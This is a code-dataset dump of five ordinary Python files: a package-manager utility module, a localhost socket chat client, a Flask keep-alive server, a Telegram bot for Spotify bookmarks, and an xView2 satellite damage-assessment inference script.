source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
utils.py
|
import os
import sys
import re
import yaml
import argparse
import logging
import subprocess
import platform
import time
import io
import json
import shlex
import signal
import builtins
import requests
import progressbar
import rfc6266
import locale
import codecs
from datetime import datetime
__all__ = [
'run_process',
'log',
'parser',
'subparsers',
'platform_name',
'platform_arch',
'system_name',
'info_from_name',
'get_install_path',
'get_package_yaml',
'get_package_list',
'save_package_list',
'find_python',
'system',
'download'
]
log = logging.getLogger('dpm')
parser = argparse.ArgumentParser(prog='dpm')
subparsers = parser.add_subparsers(help='command', metavar='command')
subparsers.required = True
from threading import Thread
from queue import Queue, Empty
import ctypes
class DownloadError(Exception):
def __str__(self):
return 'DownloadError: ' + Exception.__str__(self)
def download(target_dir, url):
response = requests.get(url, stream=True)
if not response.ok:
raise DownloadError('Can\'t download %s: response status: %i'%\
(url, response.status_code))
fname = None
cd = response.headers.get('Content-Disposition')
if cd:
fname = rfc6266.parse_headers(cd).filename_unsafe
if not fname:
fname = os.path.basename(url)
log.info('Downloading %s'%fname)
total = response.headers.get('content-length').strip()
if total:
total = int(total)
path = os.path.join(target_dir, fname)
with open(path, 'wb') as f:
widgets = [progressbar.Percentage(), ' ', progressbar.Bar(),
' ', progressbar.ETA(), ' ', progressbar.FileTransferSpeed()]
pbar = progressbar.ProgressBar(widgets=widgets, max_value=total).start()
size = 0
for block in response.iter_content(1024):
size += len(block)
f.write(block)
pbar.update(size)
pbar.finish()
return path
def run_process(*args, command=None, stop=None, stdout=log.debug,
stderr=log.error, cwd=None, format_kwargs=None,
yield_func=None, **kwargs):
if isinstance(command, dict):
if 'cwd' in command:
command_cwd = command['cwd']
if format_kwargs:
command_cwd = command_cwd.format(**format_kwargs)
command_cwd = os.path.expandvars(command_cwd)
if not os.path.isabs(command_cwd) and cwd:
cwd = os.path.join(cwd, command_cwd)
else:
cwd = command_cwd
if 'args' in command:
args = tuple(command['args']) + args
elif isinstance(command, str):
args = tuple(shlex.split(command)) + args
if format_kwargs:
args = [v.format(**format_kwargs) for v in args]
log.debug('running: %s'%' '.join([shlex.quote(v) for v in args]))
current_dir = os.getcwd()
os.chdir(cwd)
try:
proc = subprocess.Popen(args, stdout = subprocess.PIPE,
stderr = subprocess.PIPE, **kwargs)
finally:
os.chdir(current_dir)
def wait():
proc.wait()
q.put(lambda: None)
def read(stream, out):
if isinstance(stream, io.TextIOWrapper):
if callable(out):
result = ''
for char in iter(lambda: stream.read(1), ''):
if char in ('\n', '\r'):
if result:
q.put(lambda o=result: out(o))
result = ''
else:
result += char
if result:
q.put(lambda o=result[:-1]: out(o))
elif isinstance(out, io.StringIO):
for data in iter(stream.read, b''):
out.write(data)
elif isinstance(out, io.BytesIO):
for data in iter(stream.read, b''):
out.write(data.encode('utf8'))
else:
if callable(out):
encoding = locale.getpreferredencoding(False)
result = ''
it = iter(lambda: stream.read(1), b'')
for char in codecs.iterdecode(it, encoding, errors='ignore'):
if char in ('\n', '\r'):
q.put(lambda o=result: out(o))
result = ''
else:
result += char
if result:
q.put(lambda o=result[:-1]: out(o))
elif isinstance(out, io.StringIO):
encoding = locale.getpreferredencoding(False)
it = iter(stream.read, b'')
for data in codecs.iterdecode(it, encoding, errors='ignore'):
out.write(data)
elif isinstance(out, io.BytesIO):
for data in iter(stream.read, b''):
out.write(data)
q = Queue()
running = True
exc = None
threads = [ Thread(target = wait, daemon=True) ]
if stdout is not None:
th = Thread(target = read, daemon=True, args=(proc.stdout, stdout))
threads.append(th)
if stderr is not None:
th = Thread(target = read, daemon=True, args=(proc.stderr, stderr))
threads.append(th)
for v in threads:
v.start()
while True:
try:
while True:
if yield_func is not None:
yield_func()
if running and stop is not None and stop():
log.debug('process terminated!')
try:
os.kill(proc.pid, signal.SIGTERM)
except:
pass
running = False
alive = any((v.is_alive() for v in threads))
try:
q.get(alive, timeout=0.1)()
except Empty:
if not alive:
break
break
except KeyboardInterrupt as e:
if running:
log.debug('process interrupted!')
try:
os.kill(proc.pid, signal.SIGINT)
except:
pass
running = False
exc = e
if exc:
raise exc
else:
log.debug('return code: %i'%proc.returncode)
return proc.returncode == 0
is_64bits = sys.maxsize > 2**32
system = platform.system()
if is_64bits:
platform_arch = '64'
else:
platform_arch = '32'
if system == 'Windows':
system_name = 'win'
platform_name = 'win'+platform_arch
py_search_paths = [
['python.exe'],
['Scripts', 'python.exe'],
]
elif system == 'Linux':
system_name = 'linux'
platform_name = 'linux'+platform_arch
py_search_paths = [
['bin', 'python'],
]
else:
system_name = 'unknown'
platform_name = 'unknown'+platform_arch
def find_python(python_path, base_path=''):
python_path = os.path.expandvars(python_path)
base_path = os.path.expandvars(base_path)
if not os.path.isabs(python_path):
python_path = os.path.join(base_path, python_path)
if os.path.isdir(python_path):
for v in py_search_paths:
result = os.path.join(python_path, *v)
if os.path.exists(result):
return os.path.normpath(result)
else:
return os.path.normpath(python_path)
packages_install_dir = os.path.join(os.path.expanduser("~"), ".DICE", "data", "packages")
dice_config = os.path.join(os.path.expanduser("~"), ".DICE", "config", "dice.json")
def get_install_path(package_name):
package_name = package_name.replace('/', '-')
default_dir = packages_install_dir
paths = []
if os.path.exists(dice_config):
with open(dice_config) as f:
cfg = json.load(f)
paths += cfg.get('packages_dirs', [])
if 'packages_install_dir' in cfg:
default_dir = cfg['packages_install_dir']
paths.append(default_dir)
for v in set(paths):
package_dir = os.path.join(v, package_name)
if os.path.exists(package_dir):
return package_dir
return os.path.join(default_dir, package_name)
def get_package_yaml(package_name, file_name):
package_yaml = os.path.join(get_install_path(package_name), file_name)
if os.path.exists(package_yaml):
with open(package_yaml, 'r') as f:
return yaml.load(f)
def get_package_list(package_name, file_name):
path = os.path.join(get_install_path(package_name), file_name)
if os.path.exists(path):
with open(path, 'r') as f:
return f.read().split('\n')
return []
def save_package_list(package_name, file_name, items):
install_path = get_install_path(package_name)
path = os.path.join(install_path, file_name)
with open(path, 'w') as f:
f.write('\n'.join(items))
def info_from_name(package):
values = package.split('==')
name, values = values[0], values[1:]
version, values = (values[0], values[1:]) if values else ('latest', values)
machine, values = (values[0], values[1:]) if values else (platform_name, values)
return name, version, machine
|
client.py
|
import socket
import threading
name = input("Введите имя: ")
# Connecting To Server
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1', 3415))
def receive():
while True:
try:
message = client.recv(1024).decode('utf-8')
if message == 'NICK':
client.send(name.encode('utf-8'))
else:
print(message)
except:
print("Ошибка!")
client.close()
break
def write():
while True:
message = f"{name}: {input()}"
client.send(message.encode('utf-8'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return """
Currently an error, haven't found it yet.
but causes some servers not able to perform commands
including the support server,
im working on trying to fix it but cannot find the error
anywhere."""
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
telegramcontroller.py
|
""" Processing/relaying telegram messages"""
import collections
import functools
import threading
import telegram
import telegram.bot
import telegram.ext
from spottelbot import botconfig
from spottelbot import botexceptions
from spottelbot import spotifycontroller
max_message_length = 4096
def __parse_last_arg(parse_string):
"""
:param parse_string: The string to parse
:type parse_string: str
:return: A tuple containung upper and lower bound
:rtype: tuple
Parses arguments like "1-5", "1-".
"""
lower_bound = upper_bound = 0
value_list = parse_string.split('-')
# No "-" in the value
if len(value_list) == 1:
raise botexceptions.InvalidRange(parse_string)
# "-value"
if value_list[0] == "":
# Edge Case: "-5-6" (negative value as first argument)
if len(value_list) != 2:
raise botexceptions.InvalidRange(parse_string)
lower_bound = 1
else:
lower_bound = int(value_list[0])
# "2-"
if value_list[1] == "":
upper_bound = spotifycontroller.last_limit
else:
upper_bound = int(value_list[1])
return lower_bound, upper_bound
def last_range(arguments):
"""
:param arguments: List of arguments given to "/last"
:type arguments: list
:return: uper and lower bound
:rtype: tuple
Converts the argument to "/last" to a tuple (lower boundary, upper boundary). Throws InvalidRange execption if
the arguments are out of bounds or are invalid
"""
lower_bound = upper_bound = 0
# Empty argument ("/last")
if not arguments:
lower_bound = 1
upper_bound = spotifycontroller.last_limit
# "/last with one argument.
elif len(arguments) == 1:
value = arguments[0]
# Case 1: /last with exactly one numeric argument (/last 5)
if value.isdigit():
lower_bound = 1
upper_bound = int(arguments[0])
else:
# Case 2: /last with a ranged argument (/last 1-5, /last 5-, /last -10
lower_bound, upper_bound = __parse_last_arg(value)
# /last with two arguments: /last 1- 5, /last 1 -5...
elif len(arguments) == 2 or len(arguments) == 3:
try:
value = "".join(arguments)
lower_bound, upper_bound = __parse_last_arg(value)
except ValueError:
raise botexceptions.InvalidRange(value)
else:
# Too much arguments
raise botexceptions.InvalidRange(" ".join(arguments))
if upper_bound < 1 or upper_bound > spotifycontroller.last_limit:
raise botexceptions.InvalidRange(upper_bound)
if lower_bound < 1 or lower_bound > spotifycontroller.last_limit:
raise botexceptions.InvalidRange(lower_bound)
return lower_bound, upper_bound
class TelegramController(object):
# Decorators used for methods
class Decorators(object):
# Commands/Methods which are not for general used (in fact, most of them with the exception of "whoami"
@classmethod
def restricted(self, method):
def wrapper(self, bot: telegram.Bot, update: telegram.Update, args):
user: telegram.User = update.message.from_user
if self._config.has_access("@" + user.username) or self._config.has_access(user.id):
return method(self, bot, update, args)
else:
return self.unauthorized(bot, update, args)
return wrapper
# Autosave (if on, currenlty always on, setting autosave on/off needs to be written yet) method which
# affect the configfile (users, bookmarks)
@classmethod
def autosave(self, method):
def wrapper(self, *args, **kwargs):
# TODO: Autosave on/off
retval = method(self, *args, **kwargs)
self._config.save_config(None)
return retval
return wrapper
def __init__(self, config: botconfig.BotConfig, spotify_controller: spotifycontroller.SpotifyController):
"""
:param config: The botconfig
:type config: botconfig.BotConfig
:param spotify_controller: spotify controller
:type spotify_controller: spotifycontroller.SpotifyController
"""
self._config = config
self._spotify_controller = spotify_controller
self._updater = None
self._output_buffer = ""
# TODO: /adduser, /deluser /users
# TODO: /autosave (on/off)
# TODO: /mode (spotify, html, plain)
# Command(s), handler, Helptext (short), Helptext(list) long
self._handlers = (
(("bye", "quit", "shutdown"), self.__quit_handler, "Shutdown the bot (caution!)", (
"Shuts down the bot. After shutdown you have to start the again via CLI",
"*Note:* This command may take a couple of seconds before the bot process finally finishes")),
("whoami", self.__whoami_handler, "Shows the Username and it's numeric ID", (
"Returns the username and it's numeric ID to the caller",
"Useful when you get an 'Access denied' and have a look at he access rules")),
("help", self.__help_handler, "This command", ("*/help:* Show all available commands",
"*/help <command>*: Gives detailed help for the commad in question")),
("current", self.__current_handler, "Get the currently playing track", (
"Shows the currenty playing track, if any.",
"*Note:* There has to a tracking playing for this to work!",
"A track stopped at the beginning won't show up")),
("last", self.__last_handler, "Recently played tracks", (
"*last* without any parameter will get the last 50 tracks", "*/last 5* shows the last 5 tracks",
"*last 4-10* shows you track 4 to 10")),
(("show", "list"), self.__list_handler, "Shows the bookmark(s)",
("/list without any parameter lists all bookmarks", "/show <bookmarkname> shows you the <bookmarkname>")),
(("mark", "set"), self.__mark_handler, "Sets a bookmark", (
"*/mark* without any parameter will set the special bookmark 'current' to the currently playing song (if any)",
"*/mark 5* sets the special bookmark 'current' to the 5th played track",
"*/mark mybookmark 6* sets the bookmark 'mybookmark' to the 6th recently played track",
"*Note*: boomarks will be transformed to lower case, so 'BookMark' and 'bookmark' are the same")),
(("clear", "delete"), self.__clear_handler, "Deletes bookmark(s) (or all)", (
"*/clear <bookmarkname>* deletes the bookmark", "*/clear a b c* deletes bookmarks a, b and c",
"*/clear all* clears all bookmarks")),
("reload", self.__reload_handler, "Reloads config", "Reloads the config. Not very useful (yet)", None)
)
def connect(self):
"""
:return:
:rtype:
Connect to telegram, start the loop
"""
self._updater = telegram.ext.Updater(self._config.telegram_token)
for handler in self._handlers:
command_s = handler[0]
method_handler = handler[1]
self._updater.dispatcher.add_handler(telegram.ext.CommandHandler(command_s, method_handler, pass_args=True))
# Last handler - a catch all handler for unknown commands
self._updater.dispatcher.add_handler(
telegram.ext.MessageHandler(telegram.ext.Filters.command, self.__unknown_handler))
self._updater.start_polling()
def unauthorized(self, bot: telegram.Bot, update: telegram.Update, args):
bot.send_message(chat_id=update.message.chat_id, text="*You are not authorized to use this function*",
parse_mode=telegram.ParseMode.MARKDOWN)
def __send_message_buffer(self, bot: telegram.Bot, chat_id: str, text: str, final=False, **kwargs):
"""
:param bot: Telegram bot
:type bot: telegram.Bot
:param chat_id: Chat ID to send the messages to
:type chat_id: str
:param text: The text to send
:type text: str
:param final: Last part of the message, i.e. flush the buffer?
:type final: bool
:param kwargs: args to pass to bot.send_message()
:type kwargs:
:return:
:rtype:
Sends a bunch of message lines to the chat_id, honoring telegram's max message length. If a single line
(text) should exceed the maximum message length, an exception will be raised
"""
# Not sure if there should be a seperate buffer for eatch chat_id.. i.e. is this method thread safe? Does
# it need to be? For now there won't be buffers per chat_id, only one single, global one.
message_length = len(text)
if message_length >= max_message_length:
raise botexceptions.TelegramMessageLength(message_length)
if len(self._output_buffer) + message_length >= max_message_length:
bot.send_message(chat_id=chat_id, text=self._output_buffer, **kwargs)
self._output_buffer = text
else:
self._output_buffer += text
# There's no case final is set and there's an empty buffer: If buffer is full, buffer contains the
# message containing the potential overflow.
if final:
bot.send_message(chat_id=chat_id, text=self._output_buffer, **kwargs)
self._output_buffer = ""
# Since traversing the command tuples may be expensive, it makes sense caching the results.
@functools.lru_cache(maxsize=20)
def __find_help_for_command(self, command: str):
"""
:param command: The command in question
:type command: str
:return: tuple of help (each entry one line), string (quick help) or none if command not found
:rtype: tuple or str
Find the corresponding help text for the command, or None if unknown command
"""
found = False
quick_help = None
verbose_help = None
for entry in self._handlers:
command_s = entry[0]
quick_help = entry[2]
verbose_help = entry[3]
if isinstance(command_s, collections.Iterable) and not isinstance(command_s, str):
if command in command_s:
found = True
break
else:
if command == command_s:
found = True
break;
if not found:
return None
if verbose_help:
return verbose_help
else:
return quick_help + "\n"
# /clear, /delete...
@Decorators.restricted
@Decorators.autosave
def __clear_handler(self, bot: telegram.Bot, update: telegram.Update, args):
message_list = self.delete(args)
for message in message_list:
self.__send_message_buffer(bot, update.message.chat_id, text=message, final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
# /current
def __current_handler(self, bot: telegram.Bot, update: telegram.Update, args):
message = self._spotify_controller.get_current()
if not message:
message = "Nothing playing at the moment"
bot.send_message(chat_id=update.message.chat_id, text=message)
# /help, /help add, ...
@Decorators.restricted
def __help_handler(self, bot: telegram.Bot, update: telegram.Update, args):
# /help without an argument -> List all commands and the quick help
if len(args) == 0:
for entry in self._handlers:
text = "*"
command_s = entry[0]
quick_help = entry[2]
if isinstance(command_s, collections.Iterable) and not isinstance(command_s, str):
text += ", ".join(command_s)
else:
text += command_s
text += "*: {}\n".format(quick_help)
self.__send_message_buffer(bot, update.message.chat_id, text=text, final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
else:
# /help help, /help clear, /help mark clear...
for arg in args:
help = self.__find_help_for_command(arg)
if help:
self.__send_message_buffer(bot, update.message.chat_id, text="*{}*: ".format(arg), final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
if isinstance(help, collections.Iterable) and not isinstance(help, str):
for help_line in help:
self.__send_message_buffer(bot, update.message.chat_id, text=help_line + "\n", final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
else:
self.__send_message_buffer(bot, update.message.chat_id, text=help + "\n", final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
else:
# Unknown command
self.__send_message_buffer(bot, update.message.chat_id, text="*{}: Unknown command*\n".format(arg),
final=False, parse_mode=telegram.ParseMode.MARKDOWN)
# Empty Buffer
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
# /last
@Decorators.restricted
def __last_handler(self, bot: telegram.Bot, update: telegram.Update, args):
try:
lower, upper = last_range(args)
if lower > upper:
raise botexceptions.InvalidRange("{}-{}".format(lower, upper))
output_list = self._spotify_controller.get_last_tracks(lower, upper)
for i, item in enumerate(output_list, lower):
text = "*{}*: {}\n".format(i, item)
self.__send_message_buffer(bot, update.message.chat_id, text=text, final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
except botexceptions.InvalidRange as range_error:
bot.send_message(chat_id=update.message.chat_id,
text="*Invalid range {}. Must be between 1 and {}*".format(range_error.invalid_argument,
spotifycontroller.last_limit),
parse_mode=telegram.ParseMode.MARKDOWN)
# /list, /show
@Decorators.restricted
def __list_handler(self, bot: telegram.Bot, update: telegram.Update, args):
# 1.) /list without any argument -> list all bookmarks
if len(args) == 0:
bookmark_list = self._config.get_bookmarks()
if bookmark_list:
text = ""
for bookmark in bookmark_list:
track_id, playlist_id = self._config.get_bookmark(bookmark)
text = "*{}*: {}".format(bookmark, self._spotify_controller.get_track(track_id))
if playlist_id:
text += " (Playlist {})".format(self._spotify_controller.get_playlist(playlist_id))
text += "\n"
self.__send_message_buffer(bot, update.message.chat_id, text=text, final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
else:
self.__send_message_buffer(bot, update.message.chat_id, text="No bookmarks found", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
# /mark, /set..
@Decorators.restricted
@Decorators.autosave
def __mark_handler(self, bot: telegram.Bot, update: telegram.Update, args):
try:
message = self.mark(args)
except botexceptions.InvalidBookmark as invalid:
message = "*Invalid bookmark(s)/argument(s): {}*".format(invalid.invalid_bookmark)
bot.send_message(chat_id=update.message.chat_id, text=message, parse_mode=telegram.ParseMode.MARKDOWN)
def mark(self, arguments: list) -> str:
"""
:param arguments: Arguments to the "/mark" command
:type arguments: list
:return: Outputsting ("Marked", "currently nothing playing")
:rtype: str
Sets a bookmark. Raises a InvalidBookmark exception if something is wrong
"""
track_id = playlist_id = None
bookmark_name = None
index = -1
if not arguments:
# No arguments ("/mark")
index = botconfig.bookmark_current
bookmark_name = botconfig.bookmark_current
elif len(arguments) == 1:
# /mark with one argument (/mark current, /mark 5 == /mark current 5, /mark a == /mark a current
value = arguments[0]
if value.isdigit():
# /mark 5, /mark 4
index = int(value)
bookmark_name = botconfig.bookmark_current
else:
# /mark a, /mark current,,,
if value == botconfig.bookmark_current:
# /mark current
index = botconfig.bookmark_current
bookmark_name = botconfig.bookmark_current
else:
# /mark a, /mark MyBookmark
index = botconfig.bookmark_current
bookmark_name = value
elif len(arguments) == 2:
# /mark with two arguments - /mark current 5,/mark mybookmark current, /mark mybookmark 1
bookmark_name = arguments[0]
value = arguments[1]
if value.isdigit():
# /mark bookmark 5
index = int(value)
elif value == botconfig.bookmark_current:
index = botconfig.bookmark_current
else:
# /mark bookmark something ?
raise botexceptions.InvalidBookmark(value)
else:
# More than 2 arguments - /mark bookmark 5 3 4. Makes no sense
raise botexceptions.InvalidBookmark(" ".join(arguments))
if index == bookmark_name or index == botconfig.bookmark_current:
(track_id, playlist_id) = self._spotify_controller.get_current(formatted=False)
if not track_id:
return "Cannot set bookmark: Nothing playing right now"
else:
(track_id, playlist_id) = self._spotify_controller.get_last_index(index)
self._config.set_bookmark(bookmark_name, track_id, playlist_id)
return "Bookmark *{}* set".format(bookmark_name)
# /quit, /shutdown, bye
@Decorators.restricted
def __quit_handler(self, bot: telegram.Bot, update: telegram.Update, args):
bot.send_message(chat_id=update.message.chat_id, text="Shutting down")
threading.Thread(target=self.__quit).start()
# Has to be called from another thread
def __quit(self):
self._updater.stop()
self._updater.is_idle = False
# /reload
@Decorators.restricted
def __reload_handler(self, bot: telegram.Bot, update: telegram.Update, args):
output = self._config.load_config(None)
answer = ""
if output:
answer = "*Error: " + output + "*"
else:
answer = "Config reloaded"
bot.send_message(chat_id=update.message.chat_id, text=answer, parse_mode=telegram.ParseMode.MARKDOWN)
# "/whoami"
def __whoami_handler(self, bot: telegram.Bot, update: telegram.Update, args):
user: telegram.User = update.message.from_user
message = "You are @{} ({})".format(user.username, user.id)
bot.send_message(chat_id=update.message.chat_id, text=message)
# Handler for unknown coomands
def __unknown_handler(self, bot: telegram.Bot, update: telegram.Update):
bot.send_message(chat_id=update.message.chat_id, text="I dont' understand the command")
def delete(self, arguments: list) -> list:
"""
:param arguments: The arguments given to the "/delete" command
:type arguments: list
:return: list of output lines
:rtype: list
Deletes a (or some) bookmark(s) (or all, /delete or /clear all), Raises an InvalidBookmarkException/UnknownBookmarkException
"""
# /delete without an argument
if arguments is None:
raise botexceptions.InvalidBookmark("<none>")
output_list = []
for argument in arguments:
if argument == botconfig.bookmark_all:
self._config.clear_bookmarks()
output_list = ["*All bookmarks have been cleared*"]
break # No point in going on. All bookmarks are deleted.
try:
self.delete_single(argument)
output_list.append("Bookmark *{}* has been deleted\n".format(argument))
except botexceptions.InvalidBookmark as invalid:
output_list.append("Invalid bookmark {}\n".format(argument))
except KeyError:
output_list.append("Unknown bookmark {}\n".format(argument))
return output_list
def delete_single(self, bookmark_name: str):
"""
:param bookmark_name: Name of the bookmark. Raises InvalidBookmark if illegal
:type bookmark_name: str
:return:
:rtype:
"""
if not bookmark_name:
raise botexceptions.InvalidBookmark("<none>")
if bookmark_name.isdigit():
raise botexceptions.InvalidBookmark(bookmark_name)
self._config.clear_bookmark(bookmark_name)
def deluser(self, telegram_ids):
"""
:param telegram_ids: The arguments given to the "/deluser" command
:type telegram_ids: list
:return:
:rtype:
Removes access for one (or multiple) users. Raises the usual exceptions
"""
for single_id in telegram_ids:
self._config.remove_access(single_id)
def adduser(self, telegram_ids):
"""
:param telegram_ids: The arguments given to the /adduser command
:type telegram_ids: list
:return:
:rtype:
Adds access for one (or multiple) users. Raises the usual exceptions
"""
for single_id in telegram_ids:
self._config.add_access(single_id)
|
handler.py
|
import argparse
from functools import partial
import glob
import multiprocessing as mp
import os
from pathlib import Path
import random
import resource
import string
import sys
import numpy as np
from raster_processing import *
import rasterio.warp
from shapely.geometry import mapping
import torch
from torch.utils.data import DataLoader
from yacs.config import CfgNode
from tqdm import tqdm
from dataset import XViewDataset
from models.dual_hrnet import get_model
import inference
from inference import ModelWrapper, argmax, run_inference
from utils import build_image_transforms
class Files(object):
def __init__(self, ident, pre_directory, post_directory, output_directory, pre, post):
self.ident = ident
self.pre = pre_directory.joinpath(pre).resolve()
self.post = post_directory.joinpath(post).resolve()
self.loc = output_directory.joinpath('loc').joinpath(f'{self.ident}.tif').resolve()
self.dmg = output_directory.joinpath('dmg').joinpath(f'{self.ident}.tif').resolve()
self.over = output_directory.joinpath('over').joinpath(f'{self.ident}.tif').resolve()
self.profile = self.get_profile()
self.transform = self.profile["transform"]
self.opts = inference.Options(pre_path=self.pre,
post_path=self.post,
out_loc_path=self.loc,
out_dmg_path=self.dmg,
out_overlay_path=self.over,
geo_profile=self.profile,
vis=True,
use_gpu=True
)
def get_profile(self):
with rasterio.open(self.pre) as src:
return src.profile
def make_staging_structure(staging_path):
"""
Creates directory structure for staging.
:param staging_path: Staging path
:return: True if successful
"""
# TODO: Does this method of making directories work on windows or do we need to use .joinpath?
Path(f"{staging_path}/pre").mkdir(parents=True, exist_ok=True)
Path(f"{staging_path}/post").mkdir(parents=True, exist_ok=True)
return True
def make_output_structure(output_path):
"""
Creates directory structure for outputs.
:param output_path: Output path
:return: True if succussful
"""
Path(f"{output_path}/mosaics").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/chips/pre").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/chips/post").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/loc").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/dmg").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/over").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/shapes").mkdir(parents=True, exist_ok=True)
return True
def get_files(dirname, extensions=['.png', '.tif', '.jpg']):
"""
Gathers list of files for processing from path recursively.
:param dirname: path to parse
:param extensions: extensions to match
:return: list of files matching extensions
"""
dir_path = Path(dirname)
files = dir_path.glob('**/*')
files = [path.resolve() for path in files]
match = [f for f in files if f.suffix.lower() in extensions]
return match
def reproject_helper(args, raster_tuple, procnum, return_dict):
"""
Helper function for reprojection
"""
(pre_post, src_crs, raster_file) = raster_tuple
basename = raster_file.stem
dest_file = args.staging_directory.joinpath('pre').joinpath(f'{basename}.tif')
try:
return_dict[procnum] = (pre_post, reproject(raster_file, dest_file, src_crs, args.destination_crs))
except ValueError:
return None
def postprocess_and_write(config, result_dict):
"""
Postprocess results from inference and write results to file
:param config: configuration dictionary
:param result_dict: dictionary containing all required opts for each example
"""
if config.MODEL.IS_SPLIT_LOSS:
loc, cls = argmax(result_dict['loc'], result_dict['cls'])
loc = loc.numpy().astype(np.uint8)
cls = cls.numpy().astype(np.uint8)
else:
loc = torch.argmax(result_dict['loc'], dim=0, keepdim=False)
loc = loc.numpy().astype(np.uint8)
cls = copy.deepcopy(loc)
result_dict['geo_profile'].update(dtype=rasterio.uint8)
with rasterio.open(result_dict['out_loc_path'], 'w', **result_dict['geo_profile']) as dst:
dst.write(loc, 1)
with rasterio.open(result_dict['out_cls_path'], 'w', **result_dict['geo_profile']) as dst:
dst.write(cls, 1)
if result_dict['is_vis']:
mask_map_img = np.zeros((cls.shape[0], cls.shape[1], 3), dtype=np.uint8)
mask_map_img[cls == 1] = (255, 255, 255)
mask_map_img[cls == 2] = (229, 255, 50)
mask_map_img[cls == 3] = (255, 159, 0)
mask_map_img[cls == 4] = (255, 0, 0)
#for debugging original code
#compare_img = np.concatenate((result_dict['pre_image'], mask_map_img, result_dict['post_image']), axis=1)
out_dir = os.path.dirname(result_dict['out_overlay_path'])
with rasterio.open(result_dict['out_overlay_path'], 'w', **result_dict['geo_profile']) as dst:
# Go from (x, y, bands) to (bands, x, y)
mask_map_img = np.flipud(mask_map_img)
mask_map_img = np.rot90(mask_map_img, 3)
mask_map_img = np.moveaxis(mask_map_img, [0, 1, 2], [2, 1, 0])
dst.write(mask_map_img)
def main():
parser = argparse.ArgumentParser(description='Create arguments for xView 2 handler.')
parser.add_argument('--pre_directory', metavar='/path/to/pre/files/', type=Path, required=True)
parser.add_argument('--post_directory', metavar='/path/to/post/files/', type=Path, required=True)
parser.add_argument('--staging_directory', metavar='/path/to/staging/', type=Path, required=True)
parser.add_argument('--output_directory', metavar='/path/to/output/', type=Path, required=True)
parser.add_argument('--model_weight_path', metavar='/path/to/model/weights', type=Path)
parser.add_argument('--model_config_path', metavar='/path/to/model/config', type=Path)
parser.add_argument('--is_use_gpu', action='store_true', help="If True, use GPUs")
parser.add_argument('--n_procs', default=4, help="Number of processors for multiprocessing", type=int)
parser.add_argument('--batch_size', default=16, help="Number of chips to run inference on at once", type=int)
parser.add_argument('--num_workers', default=8, help="Number of workers loading data into RAM. Recommend 4 * num_gpu", type=int)
parser.add_argument('--pre_crs', help='The Coordinate Reference System (CRS) for the pre-disaster imagery.')
parser.add_argument('--post_crs', help='The Coordinate Reference System (CRS) for the post-disaster imagery.')
parser.add_argument('--destination_crs', default='EPSG:4326', help='The Coordinate Reference System (CRS) for the output overlays.')
parser.add_argument('--create_overlay_mosaic', default=False, action='store_true', help='True/False to create a mosaic out of the overlays')
parser.add_argument('--create_shapefile', default=False, action='store_true', help='True/False to create shapefile from damage overlay')
args = parser.parse_args()
make_staging_structure(args.staging_directory)
make_output_structure(args.output_directory)
print('Retrieving files...')
pre_files = get_files(args.pre_directory)
post_files = get_files(args.post_directory)
print('Re-projecting...')
# Run reprojection in parallel processes
manager = mp.Manager()
return_dict = manager.dict()
jobs = []
# Some data hacking to make it more efficient for multiprocessing
pre_files = [("pre", args.pre_crs, x) for x in pre_files]
post_files = [("post", args.post_crs, x) for x in post_files]
files = pre_files + post_files
# Launch multiprocessing jobs for reprojection
for idx, f in enumerate(files):
p = mp.Process(target=reproject_helper, args=(args, f, idx, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
reproj = [x for x in return_dict.values() if x[1] is not None]
pre_reproj = [x[1] for x in reproj if x[0] == "pre"]
post_reproj = [x[1] for x in reproj if x[0] == "post"]
print("Creating pre mosaic...")
pre_mosaic = create_mosaic(pre_reproj, Path(f"{args.output_directory}/mosaics/pre.tif"))
print("Creating post mosaic...")
post_mosaic = create_mosaic(post_reproj, Path(f"{args.output_directory}/mosaics/post.tif"))
extent = get_intersect(pre_mosaic, post_mosaic)
print('Chipping...')
pre_chips = create_chips(pre_mosaic, args.output_directory.joinpath('chips').joinpath('pre'), extent)
post_chips = create_chips(post_mosaic, args.output_directory.joinpath('chips').joinpath('post'), extent)
assert len(pre_chips) == len(post_chips)
# Loading config
config = CfgNode.load_cfg(open(args.model_config_path, 'rb'))
# Defining dataset and dataloader
pairs = []
for idx, (pre, post) in enumerate(zip(pre_chips, post_chips)):
pairs.append(Files(
pre.stem,
args.pre_directory,
args.post_directory,
args.output_directory,
pre,
post)
)
eval_dataset = XViewDataset(pairs, config, transform=build_image_transforms())
eval_dataloader = DataLoader(eval_dataset, batch_size=args.batch_size, num_workers=args.num_workers)
# Loading model
ckpt_path = args.model_weight_path
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
model = get_model(config)
model.load_state_dict(torch.load(ckpt_path, map_location='cpu')['state_dict'])
model.eval()
